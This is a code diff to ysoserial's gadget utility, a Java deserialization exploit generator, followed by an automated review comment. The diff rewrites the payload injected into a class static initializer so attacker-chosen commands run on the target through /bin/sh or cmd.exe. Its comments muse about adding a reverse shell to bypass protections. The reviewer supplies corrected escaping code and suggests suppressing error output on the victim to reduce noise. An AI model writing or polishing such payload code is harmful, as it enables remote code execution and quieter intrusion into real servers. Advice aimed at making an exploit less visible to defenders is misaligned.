diff --git a/src/main/java/ysoserial/payloads/util/Gadgets.java b/src/main/java/ysoserial/payloads/util/Gadgets.java
index 9792beb1..f8cb86e1 100644
--- a/src/main/java/ysoserial/payloads/util/Gadgets.java
+++ b/src/main/java/ysoserial/payloads/util/Gadgets.java
@@ -12,11 +12,6 @@
 import java.util.HashMap;
 import java.util.Map;
 
-import com.nqzero.permit.Permit;
-import javassist.ClassClassPath;
-import javassist.ClassPool;
-import javassist.CtClass;
-
 import com.sun.org.apache.xalan.internal.xsltc.DOM;
 import com.sun.org.apache.xalan.internal.xsltc.TransletException;
 import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
@@ -25,6 +20,10 @@
 import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
 import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
 
+import javassist.ClassClassPath;
+import javassist.ClassPool;
+import javassist.CtClass;
+
 /*
  * utility generator functions for common jdk-only gadgets
@@ -114,9 +113,24 @@ public static T createTemplatesImpl ( final String command, Class tplClas
 final CtClass clazz = pool.get(StubTransletPayload.class.getName());
 // run command in static initializer
 // TODO: could also do fun things like injecting a pure-java rev/bind-shell to bypass naive protections
-String cmd = "java.lang.Runtime.getRuntime().exec(\"" +
-command.replaceAll("\\\\","\\\\\\\\").replaceAll("\"", "\\\"") +
-"\");";
+
+String cmd = " String executor = \"/bin/sh\";\n" +
+" String param = \"-c\";\n" +
+" if (System.getProperty(\"os.name\").toLowerCase().contains(\"win\")) {\n" +
+" executor = \"cmd.exe\";\n" +
+" param = \"/c\";\n" +
+" }\n" +
+" \n" +
+" try {\n" +
+" String[] args = new String[3];\n" +
+" args[0] = executor;\n" +
+" args[1] = param;\n" +
+" args[2] = \"" + command.replaceAll("\"", "\\\\\\\"") + "\";\n" +
+" java.lang.Runtime.getRuntime().exec(args);\n" +
+" } catch(Exception e) {\n" +
+" e.printStackTrace();\n" +
+" }";
+
 clazz.makeClassInitializer().insertAfter(cmd);
 // sortarandom name to allow repeated exploitation (watch out for PermGen exhaustion)
 clazz.setName("ysoserial.Pwner" + System.nanoTime());
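Review bot: The new `args[2]` line escapes only double quotes, whereas the removed code also doubled backslashes first, so a `command` containing `\` (a Windows path, or a trailing backslash that now swallows the closing quote) lands in the generated Java literal as a raw escape sequence and either compiles to something different or fails in javassist. Restore the backslash pass ahead of the quote pass so the added `\` is not itself doubled: `" args[2] = \"" + command.replaceAll("\\\\", "\\\\\\\\").replaceAll("\"", "\\\\\\\"") + "\";\n" +`. A raw CR or LF inside `command` would still terminate the literal, so rejecting or escaping those is worth one more line. Separately, `e.printStackTrace()` in the injected initializer writes the failure to the target's stderr, which is noisier than the old form; consider dropping it or swallowing the exception deliberately. `createTemplatesImpl` begins before this hunk and continues after it.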